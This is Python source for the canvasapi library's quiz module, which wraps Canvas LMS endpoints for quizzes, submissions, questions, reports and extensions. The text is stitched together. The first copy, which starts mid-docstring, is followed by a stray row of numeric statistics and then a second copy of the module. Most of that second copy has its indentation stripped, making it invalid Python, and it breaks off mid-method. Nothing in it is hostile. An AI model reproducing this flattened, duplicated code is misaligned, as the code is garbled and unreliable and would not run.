        <https://canvas.instructure.com/doc/api/quiz_reports.html#method.quizzes/quiz_reports.create>`_

        :param report_type: The type of report, either student_analysis or item_analysis
        :type report_type: str

        :returns: `QuizReport` object
        :rtype: :class:`canvasapi.quiz.QuizReport`
        """
        if report_type not in ["student_analysis", "item_analysis"]:
            raise ValueError(
                "Param `report_type` must be a either 'student_analysis' or 'item_analysis'"
            )
        kwargs["quiz_report"] = {"report_type": report_type}
        response = self._requester.request(
            "POST",
            "courses/{}/quizzes/{}/reports".format(self.course_id, self.id),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()
        response_json.update({"course_id": self.course_id})
        return QuizReport(self._requester, response_json)

    def create_submission(self, **kwargs):
        """
        Start taking a Quiz by creating a QuizSubmission which can be used to
        answer questions and submit answers.

        :calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/submissions \
        <https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.create>`_

        :rtype: :class:`canvasapi.quiz.QuizSubmission`
        """
        response = self._requester.request(
            "POST",
            "courses/{}/quizzes/{}/submissions".format(self.course_id, self.id),
            _kwargs=combine_kwargs(**kwargs),
        )
        # Canvas wraps the submission in a one-element "quiz_submissions" list.
        response_json = response.json()["quiz_submissions"][0]
        response_json.update({"course_id": self.course_id})
        return QuizSubmission(self._requester, response_json)

    def delete(self, **kwargs):
        """
        Delete this quiz.

        :calls: `DELETE /api/v1/courses/:course_id/quizzes/:id \
        <https://canvas.instructure.com/doc/api/quizzes.html#method.quizzes/quizzes_api.destroy>`_

        :rtype: :class:`canvasapi.quiz.Quiz`
        """
        response = self._requester.request(
            "DELETE",
            "courses/{}/quizzes/{}".format(self.course_id, self.id),
            _kwargs=combine_kwargs(**kwargs),
        )
        quiz_json = response.json()
        quiz_json.update({"course_id": self.course_id})
        # Returns a fresh Quiz built from the deleted quiz's final state.
        return Quiz(self._requester, quiz_json)

    def edit(self, **kwargs):
        """
        Modify this quiz.

        :calls: `PUT /api/v1/courses/:course_id/quizzes/:id \
        <https://canvas.instructure.com/doc/api/quizzes.html#method.quizzes/quizzes_api.update>`_

        :returns: The updated quiz.
        :rtype: :class:`canvasapi.quiz.Quiz`
        """
        response = self._requester.request(
            "PUT",
            "courses/{}/quizzes/{}".format(self.course_id, self.id),
            _kwargs=combine_kwargs(**kwargs),
        )
        quiz_json = response.json()
        quiz_json.update({"course_id": self.course_id})
        return Quiz(self._requester, quiz_json)

    def get_all_quiz_reports(self, **kwargs):
        """
        Get a list of all quiz reports for this quiz.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/reports \
        <https://canvas.instructure.com/doc/api/quiz_reports.html#method.quizzes/quiz_reports.index>`_

        :rtype: :class:`canvasapi.paginated_list.PaginatedList` of
            :class:`canvasapi.quiz.QuizReport`
        """
        return PaginatedList(
            QuizReport,
            self._requester,
            "GET",
            "courses/{}/quizzes/{}/reports".format(self.course_id, self.id),
            _kwargs=combine_kwargs(**kwargs),
        )

    def get_all_quiz_submissions(self, **kwargs):
        """
        Get a list of all submissions for this quiz.

        .. warning::
            .. deprecated:: 0.13.0
                Use :func:`canvasapi.quiz.Quiz.get_submissions` instead.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/submissions \
        <https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.index>`_

        :rtype: list of :class:`canvasapi.quiz.QuizSubmission`
        """
        warnings.warn(
            "`get_all_quiz_submissions` is being deprecated and will be removed in a "
            "future version. Use `get_submissions` instead",
            DeprecationWarning,
        )
        # Thin deprecation shim: delegates directly to the replacement.
        return self.get_submissions(**kwargs)

    def get_question(self, question, **kwargs):
        """
        Get a single quiz question by ID.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/questions/:id \
        <https://canvas.instructure.com/doc/api/quiz_questions.html#method.quizzes/quiz_questions.show>`_

        :param question: The object or ID of the quiz question to retrieve.
        :type question: int, str or :class:`canvasapi.quiz.QuizQuestion`

        :rtype: :class:`canvasapi.quiz.QuizQuestion`
        """
        question_id = obj_or_id(question, "question", (QuizQuestion,))
        response = self._requester.request(
            "GET",
            "courses/{}/quizzes/{}/questions/{}".format(
                self.course_id, self.id, question_id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()
        response_json.update({"course_id": self.course_id})
        return QuizQuestion(self._requester, response_json)

    def get_questions(self, **kwargs):
        """
        List all questions for a quiz.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/questions \
        <https://canvas.instructure.com/doc/api/quiz_questions.html#method.quizzes/quiz_questions.index>`_

        :rtype: :class:`canvasapi.paginated_list.PaginatedList` of
            :class:`canvasapi.quiz.QuizQuestion`
        """
        return PaginatedList(
            QuizQuestion,
            self._requester,
            "GET",
            "courses/{}/quizzes/{}/questions".format(self.course_id, self.id),
            # Extra attributes merged into each QuizQuestion as it is built.
            {"course_id": self.course_id},
            _kwargs=combine_kwargs(**kwargs),
        )

    def get_quiz_group(self, id, **kwargs):
        """
        Get details of the quiz group with the given id.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/groups/:id \
        <https://canvas.instructure.com/doc/api/quiz_question_groups.html#method.quizzes/quiz_groups.show>`_

        :param id: The ID of the question group.
        :type id: int

        :returns: `QuizGroup` object
        :rtype: :class:`canvasapi.quiz_group.QuizGroup`
        """
        response = self._requester.request(
            "GET",
            "courses/{}/quizzes/{}/groups/{}".format(self.course_id, self.id, id),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()
        # NOTE(review): like create_question_group, this stores self.id (the
        # quiz id) under "course_id" — verify this is what QuizGroup expects.
        response_json.update({"course_id": self.id})
        return QuizGroup(self._requester, response_json)

    def get_quiz_report(self, id, **kwargs):
        """
        Returns the data for a single quiz report.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/reports/:id \
        <https://canvas.instructure.com/doc/api/quiz_reports.html#method.quizzes/quiz_reports.show>`_

        :param id: The ID of the quiz report you want to retrieve, or the report object
        :type id: int or :class:`canvasapi.quiz.QuizReport`

        :returns: `QuizReport` object
        :rtype: :class:`canvasapi.quiz.QuizReport`
        """
        id = obj_or_id(id, "id", (QuizReport,))
        response = self._requester.request(
            "GET",
            "courses/{}/quizzes/{}/reports/{}".format(self.course_id, self.id, id),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()
        response_json.update({"course_id": self.course_id})
        return QuizReport(self._requester, response_json)

    def get_quiz_submission(self, quiz_submission, **kwargs):
        """
        Get a single quiz submission.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id \
        <https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.show>`_

        :param quiz_submission: The object or ID of the quiz submission to retrieve.
        :type quiz_submission: int, string, :class:`canvasapi.quiz.QuizSubmission`

        :rtype: :class:`canvasapi.quiz.QuizSubmission`
        """
        quiz_submission_id = obj_or_id(
            quiz_submission, "quiz_submission", (QuizSubmission,)
        )
        response = self._requester.request(
            "GET",
            "courses/{}/quizzes/{}/submissions/{}".format(
                self.course_id, self.id, quiz_submission_id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()["quiz_submissions"][0]
        response_json.update({"course_id": self.course_id})
        # When the caller asked Canvas to side-load associated records
        # (via include[]), attach them to the submission as rich objects.
        if len(response.json().get("quizzes", [])) > 0:
            response_json.update(
                {"quiz": Quiz(self._requester, response.json()["quizzes"][0])}
            )
        if len(response.json().get("submissions", [])) > 0:
            response_json.update(
                {
                    "submission": Submission(
                        self._requester, response.json()["submissions"][0]
                    )
                }
            )
        if len(response.json().get("users", [])) > 0:
            response_json.update(
                {"user": User(self._requester, response.json()["users"][0])}
            )
        return QuizSubmission(self._requester, response_json)

    def get_statistics(self, **kwargs):
        """
        Get statistics for all quiz versions, or the latest quiz version.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/statistics \
        <https://canvas.instructure.com/doc/api/quiz_statistics.html#method.quizzes/quiz_statistics.index>`_

        :rtype: :class:`canvasapi.paginated_list.PaginatedList` of
            :class:`canvasapi.quiz.QuizStatistic`
        """
        return PaginatedList(
            QuizStatistic,
            self._requester,
            "GET",
            "courses/{}/quizzes/{}/statistics".format(self.course_id, self.id),
            {"course_id": self.course_id},
            # Canvas nests the list under the "quiz_statistics" key.
            _root="quiz_statistics",
            _kwargs=combine_kwargs(**kwargs),
        )

    def get_submissions(self, **kwargs):
        """
        Get a list of all submissions for this quiz.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/submissions \
        <https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.index>`_

        :rtype: :class:`canvasapi.paginated_list.PaginatedList` of
            :class:`canvasapi.quiz.QuizSubmission`
        """
        return PaginatedList(
            QuizSubmission,
            self._requester,
            "GET",
            "courses/{}/quizzes/{}/submissions".format(self.course_id, self.id),
            {"course_id": self.course_id},
            # Canvas nests the list under the "quiz_submissions" key.
            _root="quiz_submissions",
            _kwargs=combine_kwargs(**kwargs),
        )

    def set_extensions(self, quiz_extensions, **kwargs):
        """
        Set extensions for student quiz submissions.

        :calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/extensions
        <https://canvas.instructure.com/doc/api/quiz_extensions.html#method.quizzes/quiz_extensions.create>`_

        :param quiz_extensions: List of dictionaries representing extensions.
        :type quiz_extensions: list

        :rtype: list of :class:`canvasapi.quiz.QuizExtension`

        Example Usage:

        >>> quiz.set_extensions([
        ...     {
        ...         'user_id': 1,
        ...         'extra_time': 60,
        ...         'extra_attempts': 1
        ...     },
        ...     {
        ...         'user_id': 2,
        ...         'extra_attempts': 3
        ...     },
        ...     {
        ...         'user_id': 3,
        ...         'extra_time': 20
        ...     }
        ... ])
        """
        if not isinstance(quiz_extensions, list) or not quiz_extensions:
            raise ValueError("Param `quiz_extensions` must be a non-empty list.")
        if any(not isinstance(extension, dict) for extension in quiz_extensions):
            raise ValueError("Param `quiz_extensions` must only contain dictionaries")
        # Canvas requires user_id on every extension entry.
        if any("user_id" not in extension for extension in quiz_extensions):
            raise RequiredFieldMissing(
                "Dictionaries in `quiz_extensions` must contain key `user_id`"
            )
        kwargs["quiz_extensions"] = quiz_extensions
        response = self._requester.request(
            "POST",
            "courses/{}/quizzes/{}/extensions".format(self.course_id, self.id),
            _kwargs=combine_kwargs(**kwargs),
        )
        extension_list = response.json()["quiz_extensions"]
        return [
            QuizExtension(self._requester, extension) for extension in extension_list
        ]
@python_2_unicode_compatible
class QuizStatistic(CanvasObject):
    """Statistics data generated for a quiz."""

    def __str__(self):
        return "Quiz Statistic {id}".format(id=self.id)
@python_2_unicode_compatible
class QuizSubmission(CanvasObject):
    """One student's attempt at a quiz; supports answering, timing, grading
    and event capture for that attempt."""

    def __str__(self):
        return "Quiz {} - User {} ({})".format(self.quiz_id, self.user_id, self.id)

    def answer_submission_questions(self, validation_token=None, **kwargs):
        """
        Provide or update an answer to one or more quiz questions.

        :calls: `POST /api/v1/quiz_submissions/:quiz_submission_id/questions \
        <https://canvas.instructure.com/doc/api/quiz_submission_questions.html#method.quizzes/quiz_submission_questions.answer>`_

        :param validation_token: (Optional) The unique validation token for this quiz submission.
            If one is not provided, canvasapi will attempt to use `self.validation_token`.
        :type validation_token: str

        :returns: A list of quiz submission questions.
        :rtype: list of :class:`canvasapi.quiz.QuizSubmissionQuestion`
        """
        try:
            kwargs["validation_token"] = validation_token or self.validation_token
        except AttributeError:
            raise RequiredFieldMissing(
                "`validation_token` not set on this QuizSubmission, must be passed"
                " as a function argument."
            )
        # Only the latest attempt for a quiz submission can be updated, and Canvas
        # automatically returns the latest attempt with every quiz submission response,
        # so we can just use that.
        kwargs["attempt"] = self.attempt
        response = self._requester.request(
            "POST",
            "quiz_submissions/{}/questions".format(self.id),
            _kwargs=combine_kwargs(**kwargs),
        )
        questions = list()
        for question in response.json().get("quiz_submission_questions", []):
            # Seed each question with the context it needs to flag/unflag later.
            question.update(
                {
                    "quiz_submission_id": self.id,
                    "validation_token": kwargs["validation_token"],
                    "attempt": self.attempt,
                }
            )
            questions.append(QuizSubmissionQuestion(self._requester, question))
        return questions

    def complete(self, validation_token=None, **kwargs):
        """
        Complete the quiz submission by marking it as complete and grading it. When the quiz
        submission has been marked as complete, no further modifications will be allowed.

        :calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/complete \
        <https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.complete>`_

        :param validation_token: (Optional) The unique validation token for this quiz submission.
            If one is not provided, canvasapi will attempt to use `self.validation_token`.
        :type validation_token: str

        :rtype: :class:`canvasapi.quiz.QuizSubmission`
        """
        try:
            kwargs["validation_token"] = validation_token or self.validation_token
        except AttributeError:
            raise RequiredFieldMissing(
                "`validation_token` not set on this QuizSubmission, must be passed"
                " as a function argument."
            )
        # Only the latest attempt for a quiz submission can be updated, and Canvas
        # automatically returns the latest attempt with every quiz submission response,
        # so we can just use that.
        kwargs["attempt"] = self.attempt
        response = self._requester.request(
            "POST",
            "courses/{}/quizzes/{}/submissions/{}/complete".format(
                self.course_id, self.quiz_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()["quiz_submissions"][0]
        return QuizSubmission(self._requester, response_json)

    def get_submission_events(self, **kwargs):
        """
        Retrieve the set of events captured during a specific submission attempt.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/events \
        <https://canvas.instructure.com/doc/api/quiz_submission_events.html#method.quizzes/quiz_submission_events_api.index>`_

        :returns: list of QuizSubmissionEvents.
        :rtype: list
        """
        response = self._requester.request(
            "GET",
            "courses/{}/quizzes/{}/submissions/{}/events".format(
                self.course_id, self.quiz_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        events = response.json()["quiz_submission_events"]
        return [QuizSubmissionEvent(self._requester, event) for event in events]

    def get_submission_questions(self, **kwargs):
        """
        Get a list of all the question records for this quiz submission.

        :calls: `GET /api/v1/quiz_submissions/:quiz_submission_id/questions \
        <https://canvas.instructure.com/doc/api/quiz_submission_questions.html#method.quizzes/quiz_submission_questions.index>`_

        :returns: A list of quiz submission questions.
        :rtype: list of :class:`canvasapi.quiz.QuizSubmissionQuestion`
        """
        response = self._requester.request(
            "GET",
            "quiz_submissions/{}/questions".format(self.id),
            _kwargs=combine_kwargs(**kwargs),
        )
        questions = list()
        for question in response.json().get("quiz_submission_questions", []):
            # No validation_token here: read-only listing does not need one.
            question.update({"quiz_submission_id": self.id, "attempt": self.attempt})
            questions.append(QuizSubmissionQuestion(self._requester, question))
        return questions

    def get_times(self, **kwargs):
        """
        Get the current timing data for the quiz attempt, both the end_at timestamp and the
        time_left parameter.

        :calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/time \
        <https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.time>`_

        :rtype: dict
        """
        response = self._requester.request(
            "GET",
            "courses/{}/quizzes/{}/submissions/{}/time".format(
                self.course_id, self.quiz_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        return response.json()

    def submit_events(self, quiz_submission_events, **kwargs):
        """
        Store a set of events which were captured during a quiz taking session.

        :calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/events \
        <https://canvas.instructure.com/doc/api/quiz_submission_events.html#method.quizzes/quiz_submission_events_api.create>`_

        :param quiz_submission_events: The submission events to be recorded.
        :type quiz_submission_events: list

        :returns: True if the submission was successful, false otherwise.
        :rtype: bool
        """
        # NOTE(review): an empty list raises IndexError here rather than
        # RequiredFieldMissing, and only the first element's type is checked.
        if isinstance(quiz_submission_events, list) and isinstance(
            quiz_submission_events[0], QuizSubmissionEvent
        ):
            kwargs["quiz_submission_events"] = quiz_submission_events
        else:
            raise RequiredFieldMissing(
                "Required parameter quiz_submission_events missing."
            )
        response = self._requester.request(
            "POST",
            "courses/{}/quizzes/{}/submissions/{}/events".format(
                self.course_id, self.quiz_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        # Canvas answers 204 No Content when the events were recorded.
        return response.status_code == 204

    def update_score_and_comments(self, **kwargs):
        """
        Update the amount of points a student has scored for questions they've answered, provide
        comments for the student about their answer(s), or simply fudge the total score by a
        specific amount of points.

        :calls: `PUT /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id \
        <https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.update>`_

        :returns: The updated quiz.
        :rtype: :class:`canvasapi.quiz.QuizSubmission`
        """
        response = self._requester.request(
            "PUT",
            "courses/{}/quizzes/{}/submissions/{}".format(
                self.course_id, self.quiz_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()["quiz_submissions"][0]
        response_json.update({"course_id": self.course_id})
        return QuizSubmission(self._requester, response_json)
@python_2_unicode_compatible
class QuizExtension(CanvasObject):
    """Extra time/attempts granted to a single student for a single quiz."""

    def __str__(self):
        return "{quiz}-{user}".format(quiz=self.quiz_id, user=self.user_id)
@python_2_unicode_compatible
class QuizQuestion(CanvasObject):
    """A single question belonging to a quiz."""

    def __str__(self):
        return "{} ({})".format(self.question_name, self.id)

    def delete(self, **kwargs):
        """
        Delete an existing quiz question.

        :calls: `DELETE /api/v1/courses/:course_id/quizzes/:quiz_id/questions/:id \
        <https://canvas.instructure.com/doc/api/quiz_questions.html#method.quizzes/quiz_questions.destroy>`_

        :returns: True if question was successfully deleted; False otherwise.
        :rtype: bool
        """
        endpoint = "courses/{}/quizzes/{}/questions/{}".format(
            self.course_id, self.quiz_id, self.id
        )
        resp = self._requester.request(
            "DELETE", endpoint, _kwargs=combine_kwargs(**kwargs)
        )
        # Canvas answers 204 No Content on a successful delete.
        return resp.status_code == 204

    def edit(self, **kwargs):
        """
        Update an existing quiz question.

        :calls: `PUT /api/v1/courses/:course_id/quizzes/:quiz_id/questions/:id \
        <https://canvas.instructure.com/doc/api/quiz_questions.html#method.quizzes/quiz_questions.update>`_

        :rtype: :class:`canvasapi.quiz.QuizQuestion`
        """
        endpoint = "courses/{}/quizzes/{}/questions/{}".format(
            self.course_id, self.quiz_id, self.id
        )
        resp = self._requester.request(
            "PUT", endpoint, _kwargs=combine_kwargs(**kwargs)
        )
        payload = resp.json()
        payload.update({"course_id": self.course_id})
        # Refresh this object's attributes in place, then return it.
        super(QuizQuestion, self).set_attributes(payload)
        return self
@python_2_unicode_compatible
class QuizReport(CanvasObject):
    """A generated (or queued) analysis report for a quiz."""

    def __str__(self):
        return "{} ({})".format(self.report_type, self.id)

    def abort_or_delete(self, **kwargs):
        """
        Cancel a previously issued request for this report to be generated, or —
        for an already generated report — remove it, e.g. so it can be generated
        again later with an updated version that provides new features.

        :calls: `DELETE /api/v1/courses/:course_id/quizzes/:quiz_id/reports/:id \
        <https://canvas.instructure.com/doc/api/quiz_reports.html#method.quizzes/quiz_reports.abort>`_

        :returns: True if attempt was successful; False otherwise
        :rtype: bool
        """
        endpoint = "courses/{}/quizzes/{}/reports/{}".format(
            self.course_id, self.quiz_id, self.id
        )
        resp = self._requester.request(
            "DELETE", endpoint, _kwargs=combine_kwargs(**kwargs)
        )
        # 204 No Content signals the abort/delete went through.
        return resp.status_code == 204
@python_2_unicode_compatible
class QuizSubmissionEvent(CanvasObject):
    """A single event captured while a student was taking a quiz."""

    def __str__(self):
        return "{event}".format(event=self.event_type)
@python_2_unicode_compatible
class QuizSubmissionQuestion(CanvasObject):
    """A question record attached to a quiz submission; supports flagging a
    question for later review and clearing that flag."""

    def __str__(self):
        return "QuizSubmissionQuestion #{}".format(self.id)

    def _set_flag_state(self, action, validation_token, kwargs):
        """Shared implementation for :meth:`flag` and :meth:`unflag`.

        ``action`` is the trailing URL segment (``"flag"`` or ``"unflag"``).
        Refreshes this object from the response and returns True.
        """
        try:
            kwargs["validation_token"] = validation_token or self.validation_token
        except AttributeError:
            raise RequiredFieldMissing(
                "`validation_token` not set on this QuizSubmissionQuestion, must be passed"
                " as a function argument."
            )
        # Only the latest attempt for a quiz submission can be updated, and Canvas
        # automatically returns the latest attempt with every quiz submission
        # response, so we can just use that.
        kwargs["attempt"] = self.attempt
        response = self._requester.request(
            "PUT",
            "quiz_submissions/{}/questions/{}/{}".format(
                self.quiz_submission_id, self.id, action
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        question = response.json()["quiz_submission_questions"][0]
        question.update(
            {
                "validation_token": kwargs["validation_token"],
                "quiz_submission_id": self.quiz_submission_id,
            }
        )
        super(QuizSubmissionQuestion, self).set_attributes(question)
        return True

    def flag(self, validation_token=None, **kwargs):
        """
        Set a flag on a quiz question to indicate that it should be returned to later.

        :calls: `PUT /api/v1/quiz_submissions/:quiz_submission_id/questions/:id/flag \
        <https://canvas.instructure.com/doc/api/quiz_submission_questions.html#method.quizzes/quiz_submission_questions.flag>`_

        :param validation_token: (Optional) The unique validation token for the quiz submission.
            If one is not provided, canvasapi will attempt to use `self.validation_token`.
        :type validation_token: str

        :returns: True if the question was successfully flagged, False otherwise.
        :rtype: bool
        """
        return self._set_flag_state("flag", validation_token, kwargs)

    def unflag(self, validation_token=None, **kwargs):
        """
        Remove a previously set flag on a quiz question.

        :calls: `PUT /api/v1/quiz_submissions/:quiz_submission_id/questions/:id/unflag \
        <https://canvas.instructure.com/doc/api/quiz_submission_questions.html#method.quizzes/quiz_submission_questions.unflag>`_

        :param validation_token: (Optional) The unique validation token for the quiz submission.
            If one is not provided, canvasapi will attempt to use `self.validation_token`.
        :type validation_token: str

        :returns: True if the question was successfully unflagged, False otherwise.
        :rtype: bool
        """
        return self._set_flag_state("unflag", validation_token, kwargs)
@python_2_unicode_compatible
class QuizAssignmentOverrideSet(CanvasObject):
    """The collection of assignment overrides that apply to one quiz."""

    def __str__(self):
        return "Overrides for quiz_id {quiz}".format(quiz=self.quiz_id)
| 37.682682 | 129 | 0.622131 | from __future__ import absolute_import, division, print_function, unicode_literals
import warnings
from six import python_2_unicode_compatible
from canvasapi.canvas_object import CanvasObject
from canvasapi.exceptions import RequiredFieldMissing
from canvasapi.paginated_list import PaginatedList
from canvasapi.quiz_group import QuizGroup
from canvasapi.submission import Submission
from canvasapi.user import User
from canvasapi.util import combine_kwargs, obj_or_id
@python_2_unicode_compatible
class Quiz(CanvasObject):
def __str__(self):
return "{} ({})".format(self.title, self.id)
def broadcast_message(self, conversations, **kwargs):
required_key_list = ["body", "recipients", "subject"]
required_keys_present = all((x in conversations for x in required_key_list))
if isinstance(conversations, dict) and required_keys_present:
kwargs["conversations"] = conversations
else:
raise RequiredFieldMissing(
(
"conversations must be a dictionary with keys "
"'body', 'recipients', and 'subject'."
)
)
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/submission_users/message".format(
self.course_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.status_code == 201
def create_question(self, **kwargs):
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/questions".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizQuestion(self._requester, response_json)
def create_question_group(self, quiz_groups, **kwargs):
if not isinstance(quiz_groups, list) or not quiz_groups:
raise ValueError("Param `quiz_groups` must be a non-empty list.")
if not isinstance(quiz_groups[0], dict):
raise ValueError("Param `quiz_groups must contain a dictionary")
param_list = [
"name",
"pick_count",
"question_points",
"assessment_question_bank_id",
]
if not any(param in quiz_groups[0] for param in param_list):
raise RequiredFieldMissing("quiz_groups must contain at least 1 parameter.")
kwargs["quiz_groups"] = quiz_groups
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/groups".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json["quiz_groups"][0].update({"course_id": self.id})
return QuizGroup(self._requester, response_json.get("quiz_groups")[0])
def create_report(self, report_type, **kwargs):
if report_type not in ["student_analysis", "item_analysis"]:
raise ValueError(
"Param `report_type` must be a either 'student_analysis' or 'item_analysis'"
)
kwargs["quiz_report"] = {"report_type": report_type}
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/reports".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizReport(self._requester, response_json)
def create_submission(self, **kwargs):
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/submissions".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()["quiz_submissions"][0]
response_json.update({"course_id": self.course_id})
return QuizSubmission(self._requester, response_json)
def delete(self, **kwargs):
response = self._requester.request(
"DELETE",
"courses/{}/quizzes/{}".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
quiz_json = response.json()
quiz_json.update({"course_id": self.course_id})
return Quiz(self._requester, quiz_json)
def edit(self, **kwargs):
response = self._requester.request(
"PUT",
"courses/{}/quizzes/{}".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
quiz_json = response.json()
quiz_json.update({"course_id": self.course_id})
return Quiz(self._requester, quiz_json)
def get_all_quiz_reports(self, **kwargs):
return PaginatedList(
QuizReport,
self._requester,
"GET",
"courses/{}/quizzes/{}/reports".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
def get_all_quiz_submissions(self, **kwargs):
warnings.warn(
"`get_all_quiz_submissions` is being deprecated and will be removed in a "
"future version. Use `get_submissions` instead",
DeprecationWarning,
)
return self.get_submissions(**kwargs)
def get_question(self, question, **kwargs):
question_id = obj_or_id(question, "question", (QuizQuestion,))
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/questions/{}".format(
self.course_id, self.id, question_id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizQuestion(self._requester, response_json)
def get_questions(self, **kwargs):
return PaginatedList(
QuizQuestion,
self._requester,
"GET",
"courses/{}/quizzes/{}/questions".format(self.course_id, self.id),
{"course_id": self.course_id},
_kwargs=combine_kwargs(**kwargs),
)
def get_quiz_group(self, id, **kwargs):
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/groups/{}".format(self.course_id, self.id, id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.id})
return QuizGroup(self._requester, response_json)
def get_quiz_report(self, id, **kwargs):
id = obj_or_id(id, "id", (QuizReport,))
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/reports/{}".format(self.course_id, self.id, id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizReport(self._requester, response_json)
def get_quiz_submission(self, quiz_submission, **kwargs):
quiz_submission_id = obj_or_id(
quiz_submission, "quiz_submission", (QuizSubmission,)
)
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/submissions/{}".format(
self.course_id, self.id, quiz_submission_id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()["quiz_submissions"][0]
response_json.update({"course_id": self.course_id})
if len(response.json().get("quizzes", [])) > 0:
response_json.update(
{"quiz": Quiz(self._requester, response.json()["quizzes"][0])}
)
if len(response.json().get("submissions", [])) > 0:
response_json.update(
{
"submission": Submission(
self._requester, response.json()["submissions"][0]
)
}
)
if len(response.json().get("users", [])) > 0:
response_json.update(
{"user": User(self._requester, response.json()["users"][0])}
)
return QuizSubmission(self._requester, response_json)
def get_statistics(self, **kwargs):
return PaginatedList(
QuizStatistic,
self._requester,
"GET",
"courses/{}/quizzes/{}/statistics".format(self.course_id, self.id),
{"course_id": self.course_id},
_root="quiz_statistics",
_kwargs=combine_kwargs(**kwargs),
)
def get_submissions(self, **kwargs):
return PaginatedList(
QuizSubmission,
self._requester,
"GET",
"courses/{}/quizzes/{}/submissions".format(self.course_id, self.id),
{"course_id": self.course_id},
_root="quiz_submissions",
_kwargs=combine_kwargs(**kwargs),
)
def set_extensions(self, quiz_extensions, **kwargs):
if not isinstance(quiz_extensions, list) or not quiz_extensions:
raise ValueError("Param `quiz_extensions` must be a non-empty list.")
if any(not isinstance(extension, dict) for extension in quiz_extensions):
raise ValueError("Param `quiz_extensions` must only contain dictionaries")
if any("user_id" not in extension for extension in quiz_extensions):
raise RequiredFieldMissing(
"Dictionaries in `quiz_extensions` must contain key `user_id`"
)
kwargs["quiz_extensions"] = quiz_extensions
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/extensions".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
extension_list = response.json()["quiz_extensions"]
return [
QuizExtension(self._requester, extension) for extension in extension_list
]
@python_2_unicode_compatible
class QuizStatistic(CanvasObject):
    """Statistics for a single quiz."""

    def __str__(self):
        return "Quiz Statistic {id}".format(id=self.id)
@python_2_unicode_compatible
class QuizSubmission(CanvasObject):
    """A single student's submission attempt for a quiz."""

    def __str__(self):
        return "Quiz {} - User {} ({})".format(self.quiz_id, self.user_id, self.id)

    def answer_submission_questions(self, validation_token=None, **kwargs):
        """
        Provide or update an answer to one or more questions of this submission.

        :calls: `POST /api/v1/quiz_submissions/:quiz_submission_id/questions`

        :param validation_token: Token received when the submission was created.
            If omitted, falls back to `self.validation_token`.
        :type validation_token: str

        :raises RequiredFieldMissing: If no validation token is available.

        :rtype: list of :class:`QuizSubmissionQuestion`
        """
        try:
            kwargs["validation_token"] = validation_token or self.validation_token
        except AttributeError:
            raise RequiredFieldMissing(
                "`validation_token` not set on this QuizSubmission, must be passed"
                " as a function argument."
            )

        kwargs["attempt"] = self.attempt
        response = self._requester.request(
            "POST",
